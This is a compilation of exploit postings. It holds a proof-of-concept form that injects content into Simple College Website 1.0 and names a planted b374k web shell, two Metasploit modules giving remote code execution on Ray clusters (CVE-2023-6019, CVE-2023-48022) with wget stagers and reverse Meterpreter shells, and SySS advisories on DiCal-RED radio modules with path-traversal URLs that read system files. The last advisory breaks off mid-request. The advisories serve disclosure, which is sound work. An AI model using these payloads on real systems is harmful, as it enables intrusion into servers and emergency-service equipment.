<pre><code>=============================================================================================================================================<br />| # Title : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Part 01 : about-us.php<br /><br />[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 . <br /> <br />[+] Line 109 : Send the form data using fetch API (Set your target url)<br /><br />[+] save payload as poc.html<br /><br />[+] payload : <br /><br /><br /><!DOCTYPE html><br /><html lang="en"><br /><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Settings Management</title><br /> <!-- Froala Editor CSS --><br /> <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet"><br /> <!-- Bootstrap CSS --><br /> <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet"><br /> <style><br /> /* Custom Styles */<br /> #cimg {<br /> max-width: 100%;<br /> height: auto;<br /> }<br /> #preloader2 {<br /> position: fixed;<br /> top: 0;<br /> left: 0;<br /> width: 100%;<br /> height: 100%;<br /> background: rgba(0, 0, 0, 0.5);<br /> display: flex;<br /> justify-content: center;<br /> align-items: center;<br /> z-index: 9999;<br /> }<br /> .form-group {<br /> margin-bottom: 1rem;<br /> }<br /> .form-group label {<br /> display: block;<br /> margin-bottom: .5rem;<br /> }<br /> .form-group input, .form-group textarea {<br /> width: 100%;<br /> padding: .5rem;<br /> box-sizing: border-box;<br /> }<br /> </style><br /></head><br /><br /><body><br /> <div class="container"><br /> <form id="manage-settings" method="post" enctype="multipart/form-data"><br /> <div class="form-group"><br /> <label for="name"> Name</label><br /> <input type="text" id="name" name="name" required><br /> </div><br /> <div class="form-group"><br /> <label for="email">Email</label><br /> <input type="email" id="email" name="email" required><br /> </div><br /> <div class="form-group"><br /> <label for="contact">Contact</label><br /> <input type="tel" id="contact" name="contact" required><br /><br /> <div class="form-group"><br /> <label for="about">About Content</label><br /> <textarea class="text-jqte" id="about" name="about_us"></textarea><br /> </div><br /> <div class="form-group"><br /> <label for="img">Cover Image</label><br /> <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)"><br /> <img id="cimg" src="" alt="Selected Image Preview"><br /> </div><br /> <button type="submit" class="btn btn-primary">Save Settings</button><br /> </form><br /> </div><br /><br /> <br /> <div class="modal fade" id="viewer_modal" role='dialog'><br /> <div class="modal-dialog modal-md" role="document"><br /> <div class="modal-content"><br /> <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button><br /> <img src="" alt=""><br /> </div><br /> </div><br /> </div><br /><br /> <!-- jQuery --><br /> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><br /> <!-- Froala Editor JS --><br /> <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script><br /> <!-- Bootstrap JS (for modals) --><br /> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script><br /><br /> <script><br /> function displayImg(input, _this) {<br /> if (input.files && input.files[0]) {<br /> var reader = new FileReader();<br /> reader.onload = function (e) {<br /> $('#cimg').attr('src', e.target.result);<br /> }<br /> reader.readAsDataURL(input.files[0]);<br /> }<br /> }<br /><br /> $(document).ready(function () {<br /> const editorInstance = new FroalaEditor('.text-jqte');<br /> });<br /><br /> $('#manage-settings').submit(function (e) {<br /> e.preventDefault();<br /> start_load();<br /> $.ajax({<br /> url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings',<br /> data: new FormData($(this)[0]),<br /> cache: false,<br /> contentType: false,<br /> processData: false,<br /> method: 'POST',<br /> type: 'POST',<br /> error: err => {<br /> console.log(err);<br /> },<br /> success: function (resp) {<br /> if (resp == 1) {<br /> alert_toast('Data successfully saved.', 'success');<br /> setTimeout(function () {<br /> location.reload();<br /> }, 1000);<br /> }<br /> }<br /> });<br /> });<br /><br /> window.start_load = function () {<br /> $('body').prepend('<div id="preloader2"></div>');<br /> }<br /><br /> window.end_load = function () {<br /> $('#preloader2').fadeOut('fast', function () {<br /> $(this).remove();<br /> });<br /> }<br /><br /> window.viewer_modal = function ($src = '') {<br /> start_load();<br /> var t = $src.split('.');<br /> t = t[1];<br /> if (t == 'mp4') {<br /> var view = $("<video src='" + $src + "' controls autoplay></video>");<br /> } else {<br /> var view = $("<img src='" + $src + "' />");<br /> }<br /> $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();<br /> $('#viewer_modal .modal-content').append(view);<br /> $('#viewer_modal').modal({<br /> show: true,<br /> backdrop: 'static',<br /> keyboard: false,<br /> focus: true<br /> });<br /> end_load();<br /> }<br /><br /> window.uni_modal = function ($title = '', $url = '', $size = "") {<br /> start_load();<br /> $.ajax({<br /> url: $url,<br /> error: err => {<br /> console.log(err);<br /> alert("An error occurred");<br /> },<br /> success: function (resp) {<br /> if (resp) {<br /> $('#uni_modal .modal-title').html($title);<br /> $('#uni_modal .modal-body').html(resp);<br /> if ($size != '') {<br /> $('#uni_modal .modal-dialog').addClass($size);<br /> } else {<br /> $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");<br /> }<br /> $('#uni_modal').modal({<br /> show: true,<br /> backdrop: 'static',<br /> keyboard: false,<br /> focus: true<br /> });<br /> end_load();<br /> }<br /> }<br /> });<br /> }<br /><br /> window._conf = function ($msg = '', $func = '', $params = []) {<br /> $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");<br /> $('#confirm_modal .modal-body').html($msg);<br /> $('#confirm_modal').modal('show');<br /> }<br /><br /> window.alert_toast = function ($msg = 'TEST', $bg = 'success') {<br /> $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');<br /><br /> if ($bg == 'success')<br /> $('#alert_toast').addClass('bg-success');<br /> if ($bg == 'danger')<br /> $('#alert_toast').addClass('bg-danger');<br /> if ($bg == 'info')<br /> $('#alert_toast').addClass('bg-info');<br /> if ($bg == 'warning')<br /> $('#alert_toast').addClass('bg-warning');<br /><br /> $('#alert_toast .toast-body').html($msg);<br /> $('#alert_toast').toast({ delay: 3000 }).toast('show');<br /> }<br /> </script><br /></body><br /><br /></html><br /><br />[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ray cpu_profile command injection',<br /> 'Description' => %q{<br /> Ray RCE via cpu_profile command injection vulnerability.<br /> },<br /> 'Author' => [<br /> 'sierrabearchell', # Vulnerability discovery<br /> 'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module<br /> 'Takahiro Yokoyama' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2023-6019'],<br /> ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'],<br /> ],<br /> 'CmdStagerFlavor' => %i[wget],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'Platform' => %w[linux],<br /> 'Targets' => [<br /> [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],<br /> [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],<br /> [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],<br /> [<br /> 'Linux Command', {<br /> 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',<br /> 'FETCH_COMMAND' => 'WGET'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-11-15',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8265),<br /> ]<br /> )<br /> end<br /><br /> def get_nodes<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'nodes?view=summary')<br /> })<br /> return unless res && res.code == 200<br /><br /> JSON.parse(res.body)<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api/version')<br /> })<br /> return Exploit::CheckCode::Unknown unless res && res.code == 200<br /><br /> ray_version = res.get_json_document['ray_version']<br /><br /> return Exploit::CheckCode::Unknown unless ray_version<br /><br /> ray_version = Rex::Version.new(ray_version)<br /> return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= ray_version && ray_version <= Rex::Version.new('2.6.3')<br /><br /> @nodes = get_nodes<br /> return Exploit::CheckCode::Vulnerable unless @nodes.nil?<br /><br /> Exploit::CheckCode::Appears<br /> end<br /><br /> def exploit<br /> # We need to pass valid node info to /worker/cpu_profile for the server to process the request<br /> # First we list all nodes and grab the pid and ip of the first one (could be any)<br /> @nodes ||= get_nodes<br /> fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes<br /> first_node = @nodes['data']['summary'].first<br /> fail_with(Failure::Unknown, 'Failed to get pid') unless first_node.key?('agent') && first_node['agent'].key?('pid')<br /> pid = first_node['agent']['pid']<br /> fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip')<br /> ip = first_node['ip']<br /> print_good("Grabbed node info, pid: #{pid}, ip: #{ip}")<br /> case target['Type']<br /> when :nix_cmd<br /> execute_command(payload.encoded, { pid: pid, ip: ip })<br /> else<br /> execute_cmdstager({ flavor: :wget, pid: pid, ip: ip })<br /> end<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'),<br /> 'vars_get' => {<br /> 'pid' => opts[:pid],<br /> 'ip' => opts[:ip],<br /> 'duration' => 5,<br /> 'native' => 0,<br /> 'format' => "`#{cmd}`"<br /> }<br /> })<br /> end<br /><br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ray Agent Job RCE',<br /> 'Description' => %q{<br /> RCE in Ray via the agent job submission endpoint.<br /> This is intended functionality as Ray's main purpose is executing arbitrary workloads.<br /> By default Ray has no authentication.<br /> },<br /> 'Author' => [<br /> 'sierrabearchell', # Vulnerability discovery<br /> 'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module<br /> 'Takahiro Yokoyama' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2023-48022'],<br /> ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'],<br /> ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/']<br /> ],<br /> 'CmdStagerFlavor' => %i[wget],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'Platform' => %w[linux],<br /> 'Targets' => [<br /> [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],<br /> [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],<br /> [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],<br /> [<br /> 'Linux Command', {<br /> 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',<br /> 'FETCH_COMMAND' => 'WGET',<br /> 'MeterpreterTryToFork' => true<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-11-15',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8265),<br /> ]<br /> )<br /> end<br /><br /> def get_job_data(cmd)<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'api/jobs/'),<br /> 'data' => { 'entrypoint' => cmd }.to_json<br /> })<br /> unless res && res.code == 200<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'),<br /> 'data' => { 'entrypoint' => cmd }.to_json<br /> })<br /> end<br /> return unless res && res.code == 200<br /><br /> JSON.parse(res.body)<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api/version')<br /> })<br /> return Exploit::CheckCode::Unknown unless res && res.code == 200<br /><br /> ray_version = res.get_json_document['ray_version']<br /><br /> return Exploit::CheckCode::Unknown unless ray_version<br /><br /> return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')<br /><br /> @job_data = get_job_data('ls')<br /> return Exploit::CheckCode::Vulnerable unless @job_data.nil?<br /><br /> Exploit::CheckCode::Appears<br /> end<br /><br /> def exploit<br /> @job_data ||= get_job_data('ls')<br /> if @job_data<br /> print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'")<br /> end<br /> case target['Type']<br /> when :nix_cmd<br /> execute_command(payload.encoded)<br /> else<br /> execute_cmdstager({ flavor: :wget })<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> get_job_data(cmd)<br /> end<br /><br />end<br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-042<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36441<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to missing authentication checks, the device is vulnerable to the<br />disclosure of sensitive information.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The device provides a network server on TCP port 2101. This service does not<br />seem to process any input, but it regularly sends data to connected clients.<br />This includes operation messages when they are processed by the device.<br />An unauthenticated attacker can therefore gain information about current<br />emergency situations and possibly also emergency vehicle positions or routes.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />$ telnet <IP or hostname> 2101<br />[Wait ...]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br /> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-042<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-042.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br />Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgQACgkQnODkQEKd<br />i5ZG5RAAgQx1MolkOvk+4nbY4vXjd6bkqa+9e0v1vw8Yu+9Mmb7AhLqz9sHSpe/Y<br />bSGnVJowj57irXIYAjuAjXnczRuRVFgOZY+CS3+8aIi0uJ/xuaJh7OSBY6WKDMG1<br />S9voYYQ0QJBWxRBX/e+isTKag+XAAG3rBM9/B8S/kQOMXk+ikId0/l4iLici6MEg<br />QxRRVOKBgq55zMePg9s42R+M14r+QtMm/8DV6syleaJfYMj/mAq1YDfqVaJms60j<br />N2zb6dhlbnaz0xODV9Pjss3X7VvOgiHXtXTCU2CGlYIupNXAtbr0O5MZPGzrjeES<br />CrvTfn2SidvxWIJ8n9ldVdL9vImikOdZ5KWrZsaUIdVaSYumyyKNFuW4dbgsd206<br />wXU04AH82azCa9uGybCNQwjuvLLReN9H2/hZS865FIf9JD46qyV7fcSbu70kOmbb<br />u8mljYWV5cLUEmURj/K9IgSKueyHlVk8hR+seYP7KgYA3zpegbiuaMabLetPgqOT<br />j9eleo1AOeDeNqpVoBAwEA2qZ2N1LI2IfrA3ZTXWIO6qMU/r40551/3wd6TC7Fa4<br />rypR9+7J371kSRn/eLYTOOqrnlteFOdcEPQbz3r/5wUWmIuNgcR/ipzPrZKsvaPb<br />oXqB3PkjDORrKfXpBtT6oHmv7C0wRhZJgbeIhk7IYyfl8lebLps=<br />=zVD2<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-040<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Improper Authentication (CWE-287)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36444<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to improper authentication checks, the device is vulnerable to<br />unauthorized access to logs and other files on the device's file system.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The device allows viewing log files via the administrative web interface.<br />This function does not require an authenticated session.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />As other parts of the administrative web interface do require authentication,<br />a simple proof of concept is to log in to the web interface and navigate to<br />the function to view log files.<br />Log file contents are returned by a URL similar to<br />http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22%22,%22FileAlias%22:%22FdmDebugPath%22,%22LinesMax%22:0}<br /><br />Using a local proxy to remove the QSESSIONID cookie from this request shows<br />that the content is also returned when not sending any session information.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The manufacturer recommends not running the device in an untrusted network.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-02-29: Vulnerability discovered<br />2024-04-16: Vulnerability reported to manufacturer<br />2024-05-10: Manufacturer states that the vulnerability will not be fixed<br />2024-05-14: Vulnerability reported to CERT-Bund<br />2024-08-13: CERT-Bund informs us that the vendor declared the product EOL<br />2024-08-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for DiCal-RED<br /> https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/<br />[2] SySS Security Advisory SYSS-2024-040<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-040.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Sebastian Hamann of SySS GmbH.<br /><br />E-Mail: sebastian.hamann@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc<br />Key ID: 0x9CE0E440429D8B96<br />Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd<br />i5ZgGw/9GlpK9ZCfsFYDOaonfqTm0zPxu1CURL4gT2gnmcWKnvZMnSBVtI2qolR/<br />oyp8GMhBkQ5i1msTZXCBFTQfmxAjniNZ4hpg9nxY/9q7uThu8td2A89Ge9+qP7u0<br />06Z52kYGhMK+C5Ecoww9pOjNtL233B6300kSxxBh4wspAUw8NdOtnBO9zTiU8zcw<br />MPjPsoHNofn6Ah1BRw40vkPTDGoKE9wD17nNJn0lnpgvP03ZLgEErk4gkvK0L1ts<br />N33g1R0k2M3vKzhid9FUFE+OEFN4NdkmTUqylGU9uLEhtSZiZ5CT1kAcNp6PUOlA<br />EmNqudfLngHVhyfTAVXhbJV8C/I9tCiktPiPD3g4sAP5FwsmnfKXvwULCABV7Y6I<br />6szsx1JPojyaYTi0hGKviJjewyEld9p7qLuCDt/Hq6BqkxaZkAN1JuyuqMLQDw8k<br />ghIBzdqxCpaoa3r43Cg6mpiNzhe9cRYHDDSQ5wl+5nKI4NDy7xxaQd8psyg5CjCP<br />CxgJTHne5zvFhtZP7LFa82R3Yux6x6k2XcxbsgoBaBYXS9Qj+QKLU5HxbZVbVwWS<br />c0kZzHWWydiaqSfXl5OZDPZIcOZH3C95kXFY78XMOhndqg9yW7ot3OJ/RR5GfX1X<br />jqcbLv9k0XCRr55bH/vcLWoJw9oGxfX25FlH2Sp7VYiaIohd8cM=<br />=Iaf1<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-039<br />Product: DiCal-RED<br />Manufacturer: Swissphone Wireless AG<br />Affected Version(s): Unknown<br />Tested Version(s): 4009<br />Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-16<br />Solution Date: None<br />Public Disclosure: 2024-08-20<br />CVE Reference: CVE-2024-36442<br />Author of Advisory: Sebastian Hamann, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />DiCal-RED is a radio module for communication between emergency vehicles and<br />control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity<br />and runs a Linux- and BusyBox-based operating system.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The DiCal-Red radio data module reliably guides you to your destination. This<br />is ensured by the linking of navigation (also for the transmission of position<br />data) and various radio modules."<br /><br />Due to a path traversal issue, the device is vulnerable to the disclosure<br />of arbitrary files and modification of system files, effectively leading to<br />remote code execution.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The administrative web interface of the device is vulnerable to path traversal<br />attacks in several places.<br /><br />The functions to download or display log files can be used to access arbitrary<br />files on the device's file system.<br />The upload function for new license files can be used to write files anywhere<br />on the device's file system - possibly overwriting important system<br />configuration files, binaries or scripts.<br />Replacing files that are executed during system operation results in a full<br />compromise of the whole device.<br /><br />Note that the attacker needs to be authenticated in order to exploit these<br />vulnerabilities, i.e. know the administrative system password or its MD5<br />hash (cf. SYSS-2024-038).<br />However, due to another vulnerability (cf. SYSS-2024-040), authentication is<br />not required to display file contents.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />An attacker can download the file /etc/deviceconfig via the following URL:<br />http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=downloadfile&data={%22FilePath%22:%22/etc/deviceconfig%22}<br /><br />Alternatively, the same file can be viewed via<br />http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22/etc/deviceconfig%22}<br /><br />The following HTTP POST request uploads a file to the root directory (/) of<br />the device's file system:<br /><br /> POST 